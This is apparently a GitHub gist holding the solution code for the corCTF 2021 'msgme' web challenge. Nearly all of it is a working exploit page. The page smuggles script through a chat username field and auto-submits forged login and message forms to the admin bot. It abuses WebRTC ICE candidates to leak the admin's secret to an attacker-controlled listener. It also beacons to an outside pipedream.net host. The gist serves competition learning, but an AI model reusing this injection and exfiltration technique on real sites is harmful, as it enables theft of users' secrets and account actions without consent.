Skip to content

Instantly share code, notes, and snippets.

@strellic
Last active Aug 28, 2021
Embed
What would you like to do?
corCTF 2021 web/msgme solution code
<h1>yo</h1>
<script>
/*
modify the webrtc host and ip to somewhere you have a netcat listener.
send this html file to the admin, and then you should receive the secret wrapped in ZZZZZZs
then send !secret <secret> and observe network requests for your flag!
*/
const SITE = "https://msgme.be.ax";
let webrtc_host = "IP";
let webrtc_port = 7079;
let name = `: '3';";config={iceServers:[{urls:['stun:stun.schlund.de?transport=udp'],username:'',credential:''}]},pc1=new RTCPeerConnection(config),pc2=new RTCPeerConnection(config),pc2.addEventListener('icecandidate',e=>{if(e.candidate&&'srflx'==e.candidate.type){console.log('before',e.candidate);let a=new RTCIceCandidate({candidate:e.candidate.candidate.replace('udp','tcp').replace(e.candidate.address,'${webrtc_host}').replace(e.candidate.port,'${webrtc_port}'),sdpMid:e.candidate.sdpMid,sdpMLineIndex:e.candidate.sdpMLineIndex,usernameFragment:e.candidate.usernameFragment});console.log('after',a),pc1.addIceCandidate(a).catch(e=>{console.log('Failure during addIceCandidate():'+e.name)})}}),ch1=pc1.createDataChannel(null),pc1.createOffer().then(e=>{e.sdp=e.sdp.replace('ice-ufrag:','ice-ufrag:ZZZZZZ`;
let msg = `!math!roll!8ball!secret ZZZZZZ'),pc1.setLocalDescription(e),pc2.setRemoteDescription(e),pc2.createAnswer().then(e=>{pc2.setLocalDescription(e),pc1.setRemoteDescription(e)})});//`;
const login = (name) => {
let form = document.createElement("form");
form.target = "_blank";
form.method = "POST";
form.action = `${SITE}/chat/login`;
let inputName = document.createElement("input");
inputName.type = "hidden";
inputName.name = "name";
inputName.value = name;
form.appendChild(inputName);
document.body.appendChild(form);
form.submit();
};
const sendMessage = (to, msg) => {
let form = document.createElement("form");
form.method = "POST";
form.action = `${SITE}/chat/send`;
let inputTo = document.createElement("input");
inputTo.type = "hidden";
inputTo.name = "to";
inputTo.value = to;
let inputMsg = document.createElement("input");
inputMsg.type = "hidden";
inputMsg.name = "msg";
inputMsg.value = msg;
form.appendChild(inputTo);
form.appendChild(inputMsg);
document.body.appendChild(form);
form.submit();
};
login(name);
setTimeout(() => {
window.open(`${SITE}/chat?from=${encodeURIComponent(name)}`);
}, 2000);
setTimeout(() => {
navigator.sendBeacon("https://ent7dpcjud1fl.x.pipedream.net/?blyat");
sendMessage("admin", msg);
}, 3000);
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment